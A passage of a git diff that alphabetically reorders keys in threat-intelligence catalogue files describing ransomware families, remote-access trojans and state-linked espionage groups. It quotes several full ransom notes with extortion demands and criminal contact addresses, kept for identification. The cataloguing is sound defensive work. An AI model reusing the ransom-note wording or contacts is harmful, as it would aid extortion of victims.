"15a30d84-4f5f-4b75-a162-e36107d30215", "value": "Virus-Encoder" }, { @@ -9799,17 +9799,17 @@ { "description": "LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/", - "https://twitter.com/malwrhunterteam/status/1034436350748053504", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - ], "extensions": [ ".BadNews" ], "ransomnotes": [ "How To Decode Files.hta", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlsLwUjXsAA0xyY[1].jpg" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/", + "https://twitter.com/malwrhunterteam/status/1034436350748053504", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, "uuid": "ac070e9a-3cbe-11e8-9f9d-839e888f2340", @@ -10387,55 +10387,50 @@ "value": "Unnamed Android Ransomware" }, { - "value": "KEYPASS", "description": "A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/" - ], - "synonyms": [ - "KeyPass" + "extensions": [ + ".KEYPASS" ], "ransomnotes": [ "!!!KEYPASS_DECRYPTION_INFO!!!.txt", "Attention!\n\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KEYPASS\n\nThe only method of recovering files is to purchase an decrypt software and unique private key.\n\nAfter purchase you will start decrypt software, enter your unique private key and it will decrypt all your data.\n\nOnly we can give you this key and only we can recover your files.\n\nYou need to contact us by e-mail keypass@bitmessage.ch send us your personal ID and wait for further instructions.\n\nFor you to be sure, that we can decrypt your files - you can send us a 1-3 any not very big encrypted files and we will send you back it in a original form FREE.\n\nPrice for decryption $300.\n\nThis price avaliable if you contact us first 72 hours.\n\nE-mail address to contact us:\n\nkeypass@bitmessage.ch\n\n\n\nReserve e-mail address to contact us:\n\nkeypass@india.com\n\n\n\nYour personal id:\n[id]" ], - "extensions": [ - ".KEYPASS" + "refs": [ + "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/" + ], + "synonyms": [ + "KeyPass" ] }, - "uuid": "22b4070e-9efe-11e8-b617-ab269f54596c" + "uuid": "22b4070e-9efe-11e8-b617-ab269f54596c", + "value": "KEYPASS" }, { - "value": "STOP Ransomware", - "uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5" + "uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5", + "value": "STOP Ransomware" }, { - "value": "Barack Obama's Everlasting Blue Blackmail Virus Ransomware", "description": "A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a \"tip\" to decrypt the files.", "meta": { + "ransomnotes": [ + "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", + "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." + ], "refs": [ "https://twitter.com/malwrhunterteam/status/1032242391665790981", "https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/" ], "synonyms": [ "Barack Obama's Blackmail Virus Ransomware" - ], - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", - "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." ] }, - "uuid": "1a98f5ca-b024-11e8-b828-1fb7dbd6619e" + "uuid": "1a98f5ca-b024-11e8-b828-1fb7dbd6619e", + "value": "Barack Obama's Everlasting Blue Blackmail Virus Ransomware" }, { - "value": "CryptoNar", "description": "When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted.\nIf the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file's name.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/", - "https://twitter.com/malwrhunterteam/status/1034492151541977088" - ], "extensions": [ ".fully.cryptoNar", ".partially.cryptoNar" @@ -10443,9 +10438,12 @@ "ransomnotes": [ "CRYPTONAR RECOVERY INFORMATION.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/ransom-note.jpg" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/", + "https://twitter.com/malwrhunterteam/status/1034492151541977088" ] }, - "uuid": "10f92054-b028-11e8-a51f-2f82236ac72d", "related": [ { "dest-uuid": "2fb307a2-8752-4521-8973-75b68703030d", @@ -10454,24 +10452,25 @@ ], "type": "similar" } - ] + ], + "uuid": "10f92054-b028-11e8-a51f-2f82236ac72d", + "value": "CryptoNar" }, { - "value": "CreamPie Ransomware", "description": "Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.", "meta": { + "extensions": [ + ".[backdata@cock.li].CreamPie" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", "https://twitter.com/JakubKroustek/status/1033656080839139333" - ], - "extensions": [ - ".[backdata@cock.li].CreamPie" ] }, - "uuid": "1b5a756e-b034-11e8-9e7d-c3271796acab" + "uuid": "1b5a756e-b034-11e8-9e7d-c3271796acab", + "value": "CreamPie Ransomware" }, { - "value": "Jeff the Ransomware", "description": "Looks to be in-development as it does not encrypt.", "meta": { "refs": [ @@ -10479,16 +10478,12 @@ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "7854c8bc-b036-11e8-bfb0-4ff71e54bbb2" + "uuid": "7854c8bc-b036-11e8-bfb0-4ff71e54bbb2", + "value": "Jeff the Ransomware" }, { - "value": "Cassetto Ransomware", "description": "Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.", "meta": { - "refs": [ - "https://twitter.com/demonslay335/status/1034213399922524160", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - ], "extensions": [ ".cassetto" ], @@ -10496,100 +10491,104 @@ "IMPORTANT ABOUT DECRYPT.txt", "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system.", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlpDe-kXsAA2lmH[1].jpg" + ], + "refs": [ + "https://twitter.com/demonslay335/status/1034213399922524160", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "7d3287f0-b03d-11e8-b1ef-23485f43e7f9" + "uuid": "7d3287f0-b03d-11e8-b1ef-23485f43e7f9", + "value": "Cassetto Ransomware" }, { - "value": "Acroware Cryptolocker Ransomware", "description": "Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.", "meta": { + "ransomnotes": [ + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg" + ], "refs": [ "https://twitter.com/leotpsc/status/1034346447112679430", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ], "synonyms": [ "Acroware Screenlocker" - ], - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg" ] }, - "uuid": "f1b76b66-b044-11e8-8ae7-cbe7e28dd584" + "uuid": "f1b76b66-b044-11e8-8ae7-cbe7e28dd584", + "value": "Acroware Cryptolocker Ransomware" }, { - "value": "Termite Ransomware", "description": "Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.", "meta": { - "refs": [ - "https://twitter.com/B_H101/status/1034379267956715520", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - ], "extensions": [ ".aaaaaa" ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlraMbTWwAA_367[1].jpg" + ], + "refs": [ + "https://twitter.com/B_H101/status/1034379267956715520", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "a8a772b4-b04d-11e8-ad94-ab9124dff412" + "uuid": "a8a772b4-b04d-11e8-ad94-ab9124dff412", + "value": "Termite Ransomware" }, { - "value": "PICO Ransomware", "description": "S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", - "https://twitter.com/siri_urz/status/1035138577934557184" - ], - "synonyms": [ - "Pico Ransomware" - ], "extensions": [ ".PICO" ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg", "README.txt" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", + "https://twitter.com/siri_urz/status/1035138577934557184" + ], + "synonyms": [ + "Pico Ransomware" ] }, - "uuid": "5d0c28f6-b050-11e8-95a8-7b8e480b9bd2" + "uuid": "5d0c28f6-b050-11e8-95a8-7b8e480b9bd2", + "value": "PICO Ransomware" }, { - "value": "Sigma Ransomware", "description": "Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/" - ], "ransomnotes": [ "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_01.jpg", "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_02.jpg", "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg", "ReadMe.txt" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/" ] }, - "uuid": "df025902-b29e-11e8-a2ab-739167419c52" + "uuid": "df025902-b29e-11e8-a2ab-739167419c52", + "value": "Sigma Ransomware" }, { - "value": "Crypt0saur", - "uuid": "32406292-b738-11e8-ab97-1f674b130624" + "uuid": "32406292-b738-11e8-ab97-1f674b130624", + "value": "Crypt0saur" }, { - "value": "Mongo Lock", "description": "An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/" - ], "ransomnotes": [ "Your database was encrypted by 'Mongo Lock'. if you want to decrypt your database, need to be pay us 0.1 BTC (Bitcoins), also don't delete 'Unique_KEY' and save it to safe place, without that we cannot help you. Send email to us: mongodb@8chan.co for decryption service." + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/" ] }, - "uuid": "2aa481fe-c254-11e8-ad1c-efee78419960" + "uuid": "2aa481fe-c254-11e8-ad1c-efee78419960", + "value": "Mongo Lock" }, { - "value": "Kraken Cryptor Ransomware", "description": "The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it. ", "meta": { "refs": [ @@ -10597,23 +10596,24 @@ "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/" ] }, - "uuid": "c49f88f6-c87d-11e8-b005-d76e8162ced5" + "uuid": "c49f88f6-c87d-11e8-b005-d76e8162ced5", + "value": "Kraken Cryptor Ransomware" }, { - "value": "SAVEfiles", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/" - ], "extensions": [ ".SAVEfiles." ], "ransomnotes": [ "!!!SAVE__FILES__INFO!!!.txt", "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/" ] }, - "uuid": "76bfb132-cc70-11e8-8623-bb3f209be6c9" + "uuid": "76bfb132-cc70-11e8-8623-bb3f209be6c9", + "value": "SAVEfiles" } ], "version": 37 diff --git a/clusters/rat.json b/clusters/rat.json index b0b8fe5..6bb8ad1 100644 --- a/clusters/rat.json +++ b/clusters/rat.json @@ -22,18 +22,18 @@ { "description": "JadeRAT is just one example of numerous mobile surveillanceware families we've seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage. ", "meta": { - "refs": [ - "https://blog.lookout.com/mobile-threat-jaderat", - "https://www.cfr.org/interactive/cyber-operations/jaderat" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "Ethnic minorities in China" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://blog.lookout.com/mobile-threat-jaderat", + "https://www.cfr.org/interactive/cyber-operations/jaderat" ] }, "uuid": "1cc8963b-5ad4-4e19-8e9a-57b0ff1ef926", @@ -2926,7 +2926,6 @@ "value": "Hallaj PRO RAT" }, { - "value": "NukeSped", "description": "This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publically available if you don't follow the malicious hacker's commands. \n", "meta": { "refs": [ @@ -2938,7 +2937,8 @@ "https://www.alienvault.com/forums/discussion/17301/alienvault-labs-threat-intelligence-update-for-usm-anywhere-march-25-march-31-2018" ] }, - "uuid": "5d0369ee-c718-11e8-b328-035ed1bdca07" + "uuid": "5d0369ee-c718-11e8-b328-035ed1bdca07", + "value": "NukeSped" } ], "version": 18 diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index fb81e28..e3d0569 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -1111,8 +1111,6 @@ "Royal APT" ] }, - "uuid": "3501fbf2-098f-47e7-be6a-6b0ff5742ce8", - "value": "Mirage", "related": [ { "dest-uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", @@ -1121,7 +1119,9 @@ ], "type": "similar" } - ] + ], + "uuid": "3501fbf2-098f-47e7-be6a-6b0ff5742ce8", + "value": "Mirage" }, { "description": "PLA Navy", @@ -5073,6 +5073,17 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”", "meta": { "capabilities": "Watering holes, 64-bit malware, covert C2 via IPv6 DNS, ISMDOOR", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "Iraq", + "United Kingdom", + "Pakistan", + "Israel" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "IT compromise, information gathering and recon against industrial orgs", "refs": [ "https://dragos.com/adversaries.html", @@ -5084,18 +5095,7 @@ "OilRig", "Greenbug" ], - "victimology": "Oil and Gas, Manufacturing, Europe, MENA, North America", - "cfr-suspected-victims": [ - "Iraq", - "United Kingdom", - "Pakistan", - "Israel" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Oil and Gas, Manufacturing, Europe, MENA, North America" }, "related": [ { @@ -5190,6 +5190,14 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor compromises the networks of companies involved in electric power, specifically looking for intellectual property and information about the companies’ operations.", "meta": { "capabilities": "Encoded binaries in documents, evasion techniques", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "United States" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "IT compromise with hardened anti-analysis malware against industrial orgs", "refs": [ "https://dragos.com/adversaries.html", @@ -5201,15 +5209,7 @@ "Lazarus", "Hidden Cobra" ], - "victimology": "Electric Utilities, US", - "cfr-suspected-victims": [ - "United States" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Electric Utilities, US" }, "related": [ { @@ -5234,6 +5234,14 @@ "description": "Adversaries abusing ICS (based on Dragos Inc adversary list).\nThis threat actor targets industrial control systems in Turkey, Europe, and North America.\n Believed to be linked to Crouching Yeti", "meta": { "capabilities": "GOODOR, DORSHEL, KARAGANY, Mimikatz", + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "Turkey" + ], + "cfr-target-category": [ + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "mode-of-operation": "Deep ICS environment information gathering, operator credentials, industrial process details", "refs": [ "https://dragos.com/adversaries.html", @@ -5245,15 +5253,7 @@ "Dragonfly2", "Berserker Bear" ], - "victimology": "Turkey, Europe, US", - "cfr-suspected-victims": [ - "Turkey" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Private sector" - ] + "victimology": "Turkey, Europe, US" }, "uuid": "a08ab076-33c1-4350-b021-650c34277f2d", "value": "DYMALLOY" @@ -5332,6 +5332,26 @@ { "description": "Experts assigned the codename of LuckyMouse to the group behind this hack, but they later realized the attackers were an older Chinese threat actor known under various names in the reports of other cyber-security firms, such as Emissary Panda, APT27, Threat Group 3390, Bronze Union, ZipToken, and Iron Tiger", "meta": { + "cfr-suspected-state-sponsor": "Unknown", + "cfr-suspected-victims": [ + "United States", + "Japan", + "Taiwan", + "India", + "Canada", + "China", + "Thailand", + "Israel", + "Australia", + "Republic of Korea", + "Russia", + "Iran" + ], + "cfr-target-category": [ + "Government", + "Private sector" + ], + "cfr-type-of-incident": "Espionage", "refs": [ "https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/", "https://www.secureworks.com/research/bronze-union", @@ -5347,26 +5367,6 @@ "Bronze Union", "ZipToken", "Iron Tiger" - ], - "cfr-suspected-victims": [ - "United States", - "Japan", - "Taiwan", - "India", - "Canada", - "China", - "Thailand", - "Israel", - "Australia", - "Republic of Korea", - "Russia", - "Iran" - ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Government", - "Private sector" ] }, "related": [ @@ -5398,24 +5398,24 @@ { "description": "The Rancor group’s attacks use two primary malware families which are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to Singapore and Cambodia.", "meta": { + "cfr-suspected-state-sponsor": "China", + "cfr-suspected-victims": [ + "Singapore", + "Cambodia" + ], + "cfr-target-category": [ + "Government", + "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "country": "CN", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", "https://www.cfr.org/interactive/cyber-operations/rancor" ], "synonyms": [ "Rancor group" - ], - "cfr-suspected-victims": [ - "Singapore", - "Cambodia" - ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", - "cfr-target-category": [ - "Government", - "Civil society" - ], - "country": "CN" + ] }, "uuid": "79c7c7e0-79d5-11e8-9b9c-1ff96be20c0b", "value": "RANCOR" @@ -5473,8 +5473,6 @@ "value": "RedAlpha" }, { - "value": "APT-C-35", - "uuid": "b9dc4e81-909f-4324-8b25-a0f359cd88e0", "description": "In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization", "meta": { "refs": [ @@ -5483,36 +5481,34 @@ "synonyms": [ "DoNot Team" ] - } + }, + "uuid": "b9dc4e81-909f-4324-8b25-a0f359cd88e0", + "value": "APT-C-35" }, { - "value": "TempTick", "description": "This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/temptick" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "South Korea", "Japan" ], - "cfr-suspected-state-sponsor": "China", "cfr-target-category": [ "Government", "Private sector" ], - "country": "CN" + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/temptick" + ] }, - "uuid": "3f3ff6de-a6a7-11e8-92b4-3743eb1c7762" + "uuid": "3f3ff6de-a6a7-11e8-92b4-3743eb1c7762", + "value": "TempTick" }, { - "value": "Operation Parliament", "description": "This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/operation-parliament", - "https://securelist.com/operation-parliament-who-is-doing-what/85237/" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "Palestine", "United Arab Emirates", @@ -5542,22 +5538,23 @@ "Oman", "Denmark" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Civil society" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/operation-parliament", + "https://securelist.com/operation-parliament-who-is-doing-what/85237/" ] }, - "uuid": "e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d" + "uuid": "e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d", + "value": "Operation Parliament" }, { - "value": "Inception Framework", "description": "This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/inception-framework" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "South Africa", "Malaysia", @@ -5565,22 +5562,22 @@ "Suriname", "United Kingdom" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Private sector" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/inception-framework" ] }, - "uuid": "71ef51ca-a791-11e8-a026-07980ca910ca" + "uuid": "71ef51ca-a791-11e8-a026-07980ca910ca", + "value": "Inception Framework" }, { - "value": "Winnti Umbrella", "description": "This threat actor targets software companies and political organizations in the United States, China, Japan, and South Korea. It primarily acts to support cyber operations conducted by other threat actors affiliated with Chinese intelligence services.\nBelieved to be associated with the Axiom, APT 17, and Mirage threat actors. Believed to share the same tools and infrastructure as the threat actors that carried out Operation Aurora, the 2015 targeting of video game companies, the 2015 targeting of the Thai government, and the 2017 targeting of Chinese-language news websites", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/winnti-umbrella" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "United States", "South Korea", @@ -5588,14 +5585,15 @@ "China", "Japan" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Private sector" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/winnti-umbrella" + ] }, - "uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", "related": [ { "dest-uuid": "24110866-cb22-4c85-a7d2-0413e126694b", @@ -5618,26 +5616,26 @@ ], "type": "similar" } - ] + ], + "uuid": "9cebfaa8-a797-11e8-99e0-3ffa312b9a10", + "value": "Winnti Umbrella" }, { - "value": "HenBox", "description": "This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/henbox" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "Uighurs" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Civil society" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/henbox" + ] }, - "uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896", "related": [ { "dest-uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", @@ -5646,53 +5644,52 @@ ], "type": "similar" } - ] + ], + "uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896", + "value": "HenBox" }, { - "value": "Mustang Panda", "description": "This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/mustang-panda" - ], + "cfr-suspected-state-sponsor": "China", "cfr-suspected-victims": [ "United States" ], - "cfr-suspected-state-sponsor": "China", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Civil society" ], - "country": "CN" + "cfr-type-of-incident": "Espionage", + "country": "CN", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/mustang-panda" + ] }, - "uuid": "78bf726c-a9e6-11e8-9e43-77249a2f7339" + "uuid": "78bf726c-a9e6-11e8-9e43-77249a2f7339", + "value": "Mustang Panda" }, { - "value": "Thrip", "description": "This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/thrip", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ], + "cfr-suspected-state-sponsor": "Unknown", "cfr-suspected-victims": [ "United States" ], - "cfr-suspected-state-sponsor": "Unknown", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Private sector" + ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/thrip", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ] }, - "uuid": "98be4300-a9ef-11e8-9a95-bb9221083cfc" + "uuid": "98be4300-a9ef-11e8-9a95-bb9221083cfc", + "value": "Thrip" }, { - "value": " Stealth Mango and Tangelo ", "description": "This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo" - ], + "cfr-suspected-state-sponsor": "Pakistan", "cfr-suspected-victims": [ "Pakistan", "Iraq", @@ -5703,28 +5700,30 @@ "India", "United States" ], - "cfr-suspected-state-sponsor": "Pakistan", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Civil society" ], - "country": "PK" + "cfr-type-of-incident": "Espionage", + "country": "PK", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo" + ] }, - "uuid": "f82b352e-a9f8-11e8-8be8-fbcf6eddd58c" + "uuid": "f82b352e-a9f8-11e8-8be8-fbcf6eddd58c", + "value": " Stealth Mango and Tangelo " 